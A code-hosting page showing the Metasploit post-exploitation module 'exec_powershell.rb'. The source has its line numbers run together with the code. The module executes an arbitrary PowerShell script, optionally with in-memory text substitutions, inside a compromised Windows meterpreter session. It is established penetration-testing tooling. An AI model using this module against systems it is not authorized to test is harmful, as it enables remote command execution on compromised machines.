CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/post/windows/manage/exec_powershell.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Post6include Msf::Post::Windows::Powershell78def initialize(info = {})9super(10update_info(11info,12'Name' => 'Windows Powershell Execution Post Module',13'Description' => %q{14This module will execute a powershell script in a meterpreter session.15The user may also enter text substitutions to be made in memory before execution.16Setting VERBOSE to true will output both the script prior to execution and the results.17},18'License' => MSF_LICENSE,19'Platform' => ['windows'],20'SessionTypes' => ['meterpreter'],21'Author' => [22'Nicholas Nam (nick[at]executionflow.org)', # original meterpreter script23'RageLtMan <rageltman[at]sempervictus>' # post module and libs24]25)26)2728register_options(29[30OptString.new('SCRIPT', [true, 'Path to the local PS script or command string to execute']),31]32)3334register_advanced_options(35[36OptString.new('SUBSTITUTIONS', [false, 'Script subs in gsub format - original,sub;original,sub']),37]38)39end4041def run42# Make sure we meet the requirements before running the script, note no need to return43# unless error44raise 'Powershell not available' if !have_powershell?4546# Preprocess the Powershell::Script object with substitions from Exploit::Powershell47script = make_subs(read_script(datastore['SCRIPT']), process_subs(datastore['SUBSTITUTIONS']))4849# Execute in session50print_status psh_exec(script)51print_good 'Finished!'52end53end545556